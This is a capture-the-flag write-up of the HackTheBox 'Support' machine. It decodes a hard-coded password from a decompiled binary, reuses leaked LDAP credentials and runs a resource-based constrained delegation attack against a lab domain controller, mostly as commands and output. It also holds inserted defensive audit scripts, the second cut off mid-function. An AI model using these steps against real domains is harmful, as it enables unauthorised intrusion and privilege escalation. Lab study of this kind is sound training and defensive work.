Support-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous SMB access, decompiling a .NET binary with dnSpy, decrypting the stored password, enumerating domain user information with ldapsearch, abusing resource-based constrained delegation

Reference: https://0xdf.gitlab.io/2022/12/17/htb-support.html

Reference: https://vandanpathak.com/htb-writeups/support-htb-writeup-and-rbcd-attack/

0x01 Obtaining user access

1. Get the target IP address: 10.10.11.174

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,123 --min-rate=10000 10.10.11.174 -sU -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-20 16:39 CST
Nmap scan report for 10.10.11.174
Host is up (0.32s latency).

PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
88/udp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-20 08:39:46Z)
123/udp open ntp NTP v3
| ntp-info:
|_
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.94SVN%I=7%D=3/20%Time=65FAA0E1%P=aarch64-unknown-linux-g
SF:nu%r(NBTStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAA
SF:AAAAAAAAAAAAAAAA\0\0!\0\x01");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.69 seconds


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.174 -oG allports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49676/tcp open unknown
49679/tcp open unknown
49757/tcp open unknown
51350/tcp open unknown


┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49676,49679,49757,51350,



┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49676,49679,49757,51350 --min-rate=10000 -sC -sV 10.10.11.174
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-20 08:39:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49757/tcp open msrpc Microsoft Windows RPC
51350/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-03-20T08:41:54
|_ start_date: N/A
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

3. Add the domain name to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.174 support.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.174 support.htb

4. Anonymous access to and enumeration of the SMB service

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.174 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 21 01:01:06 2022
.. D 0 Sat May 28 19:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 19:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 19:19:55 2022
putty.exe A 1273576 Sat May 28 19:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 19:19:31 2022
UserInfo.exe.zip A 277499 Thu Jul 21 01:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 19:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 19:19:43 2022

4026367 blocks of size 4096. 970934 blocks available
smb: \> get UserInfo.exe.zip
getattrib: NT_STATUS_IO_TIMEOUT
smb: \> get getSMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \ge


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\support-tools -N
Try "help" to get a list of possible commands.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (40.6 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \> exit


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.174\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

5. Extract the contents of the archive we found

┌──(kali㉿offsec)-[~/Desktop/userinfo]
└─$ cat UserInfo.exe.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
</startup>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>

6. Inspect UserInfo.exe with strings

┌──(kali㉿offsec)-[~/Desktop/userinfo]
└─$ strings UserInfo.exe
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
,Er
,ZsE
BSJB
v4.0.30319
#Strings
#GUID
#Blob
<Main>d__0
<>u__1
Task`1
CommandLineParser`1
TaskAwaiter`1
IParserResult`1
Int32
<OnExecuteAsync>d__2
Command`2
Int64
<Module>
<Main>
get_ASCII
mscorlib
ParseAsync
OnExecuteAsync
get_PropertiesToLoad
Protected
AwaitUnsafeOnCompleted
get_IsCompleted
System.Collections.Specialized
<UserName>k__BackingField
<LastName>k__BackingField
<FirstName>k__BackingField
<Verbose>k__BackingField
MatthiWare.CommandLine.Abstractions.Command
getPassword
enc_password
get_Message
IDisposable
Console
set_AppName
get_UserName
set_UserName
get_LastName
set_LastName
get_FirstName
set_FirstName
username
FromFileTime
DateTime
FindOne
MatthiWare.CommandLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
set_AuthenticationType
OnConfigure
ReadOnlyCollectionBase
get_Verbose
set_Verbose
verbose
Dispose
Create
<>1__state
Write
RequiredAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
NameAttribute
AsyncStateMachineAttribute
DefaultValueAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
value
UserInfo.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MatthiWare.CommandLine.Abstractions.Parsing
get_Task
FindAll
Program
get_Item
System
CancellationToken
cancellationToken
Main
System.Reflection
ResultPropertyValueCollection
StringCollection
SearchResultCollection
ResultPropertyCollection
SetException
Description
UserInfo
AsyncTaskMethodBuilder
ICommandConfigurationBuilder
<>t__builder
DirectorySearcher
FindUser
GetUser
printUser
CommandLineParser
TaskAwaiter
GetAwaiter
set_Filter
IEnumerator
GetEnumerator
.ctor
.cctor
System.Diagnostics
UserInfo.Commands
DiscoverCommands
UserInfo.Services
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.DirectoryServices
DebuggingModes
get_Properties
AuthenticationTypes
MatthiWare.CommandLine.Core.Attributes
GetBytes
args
System.Threading.Tasks
Contains
System.Collections
commandOptions
GlobalOptions
FindUserOptions
GetUserOptions
CommandLineParserOptions
options
get_HasErrors
Concat
Object
get_Default
SearchResult
GetResult
SetResult
get_Current
get_Count
Start
Convert
last
first
MoveNext
System.Text
GetExecutingAssembly
LdapQuery
query
DirectoryEntry
entry
WrapNonExceptionThrows
UserInfo
Copyright
2022
$5a280d0b-9fd0-4701-8f96-82e2f1ea9dfb
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
UserInfo.Program+<Main>d__0
/UserInfo.Commands.FindUser+<OnExecuteAsync>d__2
.UserInfo.Commands.GetUser+<OnExecuteAsync>d__2
username
Username
first
First name
last
Last name
verbose
Verbose output
RSDS
C:\Users\0xdf\source\repos\UserInfo\obj\Release\UserInfo.pdb
_CorExeMain
mscoree.dll

7. Still nothing major, but the entry point must be in here

8. Hint from Task 4: since this is a .NET binary, tools such as dnSpy and ILSpy will effectively return the source code. Alternatively, run the binary (on Windows or under Wine) and capture the authentication with Wireshark.

9. I need to decompile it with a tool and take a look

this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

10. Following the function reveals this hard-coded password

namespace UserInfo.Services
{
// Token: 0x02000006 RID: 6
internal class Protected
{
// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}

// Token: 0x04000005 RID: 5
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

// Token: 0x04000006 RID: 6
private static byte[] key = Encoding.ASCII.GetBytes("armando");
}
}

11. This needs to be decoded:

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3
Python 3.11.7 (main, Dec 8 2023, 14:22:46) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import b64decode
>>> from itertools import cycle
>>> pass_b64 = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
>>> key = b"armando"
>>> enc = b64decode(pass_b64)
>>> [e^k^223 for e,k in zip(enc, cycle(key))]
[110, 118, 69, 102, 69, 75, 49, 54, 94, 49, 97, 77, 52, 36, 101, 55, 65, 99, 108, 85, 102, 56, 120, 36, 116, 82, 87, 120, 80, 87, 79, 49, 37, 108, 109, 122]
>>> bytearray([e^k^223 for e,k in zip(enc, cycle(key))]).decode()
'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
>>>

12. Verify with crackmapexec whether the credentials work

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB support.htb 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB support.htb 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

13. Looks good, so let's fire up BloodHound and start collecting information

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.support.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.support.htb

14. There is an error; first add the DC hostname to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.174 dc.support.htb" | sudo tee -a /etc/hosts
10.10.11.174 dc.support.htb

15. Continue with information gathering

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -c ALL -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -dc dc.support.htb -ns 10.10.11.174 --zip
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 43S
INFO: Compressing output into 20240320204202_bloodhound.zip

16. Start the neo4j database

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo neo4j start
[sudo] kali 的密码:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:19004). It is available at http://localhost:7474
There may be a short delay until the server is ready.

17. A frantic round of analysis, still no leads = =

18. Following the guided-mode hints, use ldapsearch to enumerate the whole directory

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -x -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > res.txt


····
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
····
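The password above sits in the user's info attribute, which any authenticated domain account can read. As an added example (not part of the original writeup), the following Python script parses ldapsearch LDIF output and flags note-style attributes (info, description, comment) whose values look like credentials, so an administrator can audit the directory for this pattern; the LDIF is a constructed sample modelled on the dump above, and the helpdesk entry is invented.

```python
import base64
import re

# Free-text attributes that administrators sometimes use as note fields; the
# ldapsearch dump above shows a password stored in "info". All names lower-case.
NOTE_ATTRS = {"info", "description", "comment", "userpassword", "unixuserpassword"}

# Constructed sample modelled on the ldapsearch output above (not a real dump);
# the "helpdesk" entry is invented to show a note field that is NOT flagged.
SAMPLE_LDIF = """\
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: user
cn: support
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
sAMAccountName: support

# helpdesk, Users, support.htb
dn: CN=helpdesk,CN=Users,DC=support,DC=htb
objectClass: user
cn: helpdesk
description: Shared help desk account, see the ticket
 ing system for the owner
sAMAccountName: helpdesk

# search result
search: 2
result: 0 Success
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w;-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse ldapsearch LDIF output into [{'dn': ..., 'attrs': {name: [values]}}].

    Handles '#' comment lines, 'attr:: base64' values and continuation lines
    (a leading space); blank lines separate entries. Attribute names are
    lower-cased because LDAP attribute names are case-insensitive.
    """
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]      # continuation of the previous line
        else:
            unfolded.append(line)

    entries, current = [], None
    for line in unfolded:
        if not line.strip():
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            try:
                value = base64.b64decode(value).decode("utf-8", "replace")
            except ValueError:
                pass                      # keep the raw text if it is not valid base64
        if current is None:
            current = {"dn": None, "attrs": {}}
        if attr == "dn":
            current["dn"] = value
        else:
            current["attrs"].setdefault(attr, []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def looks_like_secret(value):
    """Crude heuristic: one token of 10+ characters that mixes letters and digits."""
    v = value.strip()
    return (len(v) >= 10 and not any(c.isspace() for c in v)
            and any(c.isalpha() for c in v) and any(c.isdigit() for c in v))


def find_notefield_secrets(ldif_text):
    """Return (dn, attribute, value) for note attributes that look like credentials."""
    findings = []
    for entry in parse_ldif(ldif_text):
        if not entry["dn"]:              # trailer such as 'search: 2 / result: 0'
            continue
        for attr, values in entry["attrs"].items():
            if attr in NOTE_ATTRS:
                findings.extend((entry["dn"], attr, v) for v in values if looks_like_secret(v))
    return findings


if __name__ == "__main__":
    for dn, attr, value in find_notefield_secrets(SAMPLE_LDIF):
        print("possible credential in %s of %s: %s" % (attr, dn, value))
```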

19. Found a user's credentials; try logging in

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


Directory: C:\Users\support\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/20/2024 6:29 PM 34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop>

20. Got the first flag

*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
4055646bc297ff4f6cdd864e2aea3739
*Evil-WinRM* PS C:\Users\support\Desktop>

0x02 Obtaining system access

21. Now that we have another domain account, look at the BloodHound data again: the support user is a member of the Shared Support Accounts group, which has GenericAll on the computer object DC.SUPPORT.HTB:

I will abuse resource-based constrained delegation. First, I add a fake computer under my control to the domain. Then I can act as the DC and request Kerberos tickets for the fake computer, which lets me impersonate other accounts, such as the administrator. For this I need an authenticated user who can add computers to the domain (by default any user can add up to 10 computers); this is configured in the ms-ds-machineaccountquota attribute, which must be greater than 0. Finally, I need write access to a domain-joined computer (here, GenericAll on the DC).

Continuing the plan, we use evil-winrm to upload Powermad to the target server. The commands that follow add a fake computer to the AD objects, configure the new fake computer with constrained delegation rights, and generate the password hash for this newly created entity.

22. Carry out the attack following the walkthrough

┌──(kali㉿offsec)-[~/Desktop/tools/PowerSploit]
└─$ evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\support\Desktop\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Powermad/Powermad.ps
/home/kali/Desktop/tools/Powermad/Powermad.ps1 /home/kali/Desktop/tools/Powermad/Powermad.psd1 /home/kali/Desktop/tools/Powermad/Powermad.psm1
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Powermad/Powermad.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit//home/kali/Desktop/tools/Powermad/Powermad.ps1 to C:\Users\support\Desktop\Powermad.ps1

Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /home/kali/Desktop/tools/PowerSploit/home/kali/Desktop/tools/Powermad/Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> upload ../Powermad/Powermad.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit/../Powermad/Powermad.ps1 to C:\Users\support\Desktop\Powermad.ps1

Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe

Info: Uploading /home/kali/Desktop/tools/PowerSploit//home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\Users\support\Desktop\Rubeus.exe

Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /home/kali/Desktop/tools/PowerSploit/home/kali/Desktop/tools/Rubeus/Rubeus.exe
*Evil-WinRM* PS C:\Users\support\Desktop> upload ../Rubeus/Rubeus.exe

Info: Uploading /home/kali/Desktop/tools/PowerSploit/../Rubeus/Rubeus.exe to C:\Users\support\Desktop\Rubeus.exe

Data: 369320 bytes of 369320 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Desktop> dir


Directory: C:\Users\support\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/20/2024 7:50 PM 135576 Powermad.ps1
-a---- 3/20/2024 7:44 PM 770279 PowerView.ps1
-a---- 3/20/2024 7:59 PM 276992 Rubeus.exe
-ar--- 3/20/2024 6:29 PM 34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop>

*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./PowerView.ps1

23. I will verify that the user can add computers to the domain

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

ms-ds-machineaccountquota
-------------------------
10


*Evil-WinRM* PS C:\Users\support\Desktop>

24. I also need to make sure the environment has a DC newer than 2012:

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController | select name,osversion | fl


Name : dc.support.htb
OSVersion : Windows Server 2022 Standard



*Evil-WinRM* PS C:\Users\support\Desktop>

25. Finally, I want to check whether msds-allowedtoactonbehalfofotheridentity is empty:

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl


name : DC
msds-allowedtoactonbehalfofotheridentity :



*Evil-WinRM* PS C:\Users\support\Desktop>

26. Create the fake computer: I will use Powermad's New-MachineAccount to create it:

*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString '0xdf0xdf123' -AsPlainText -Force)
[+] Machine account 0xdfFakeComputer added
*Evil-WinRM* PS C:\Users\support\Desktop>

27. I also need the SID of the computer object, so I save it in a variable:

*Evil-WinRM* PS C:\Users\support\Desktop> $fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid
*Evil-WinRM* PS C:\Users\support\Desktop> $fakesid
S-1-5-21-1677581083-3380853377-188903654-5601
*Evil-WinRM* PS C:\Users\support\Desktop>

28. Attack: now I will configure the DC to trust my fake computer to make authorization decisions on its behalf. These commands build an ACL with the fake computer's SID and assign it to the DC:

*Evil-WinRM* PS C:\Users\support\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
*Evil-WinRM* PS C:\Users\support\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Desktop> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Warning: [Set-DomainObject] Error setting/replacing properties for object 'MANAGEMENT$' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\support\Desktop>

29. I will verify that it worked:

*Evil-WinRM* PS C:\Users\support\Desktop> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
*Evil-WinRM* PS C:\Users\support\Desktop> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
*Evil-WinRM* PS C:\Users\support\Desktop> $Descriptor.DiscretionaryAcl


BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5601
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None



*Evil-WinRM* PS C:\Users\support\Desktop>
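The descriptor read back above is the binary form of the SDDL string built in step 28; its AccessMask 983551 (0xF01FF) is exactly the thirteen rights listed there. As an added example (not from the original writeup), this Python script parses such an SDDL string, recomputes the mask from the rights abbreviations and reports every SID allowed to act on behalf of the computer, which is how a defender can audit msDS-AllowedToActOnBehalfOfOtherIdentity against an allowlist; it assumes the attribute has already been exported as SDDL (for instance with RawSecurityDescriptor.GetSddlForm on Windows).

```python
import re

# SDDL access-right abbreviations and their mask bits (Windows SDDL specification).
# The descriptor written in step 28 uses the first thirteen; the generic rights
# GA/GX/GW/GR are included so other descriptors parse too.
SDDL_RIGHTS = {
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100, "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000,
    "WO": 0x00080000, "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000,
    "GR": 0x80000000,
}

# One ACE: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^)]*)\)")

# The SDDL string from step 28, kept here as the sample input for the audit.
SAMPLE_SDDL = ("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
               "S-1-5-21-1677581083-3380853377-188903654-5601)")


def split_sections(sddl):
    """Split 'O:...G:...D:...S:...' into {'O': ..., 'D': ...}.

    A section marker is a letter followed by ':' outside any ACE parentheses,
    so an owner alias such as 'BA' followed by 'D:' is split correctly.
    """
    sections, key, start, depth = {}, None, 0, 0
    for i, c in enumerate(sddl):
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        elif c == ":" and depth == 0 and i > 0:
            if key is not None:
                sections[key] = sddl[start:i - 1]
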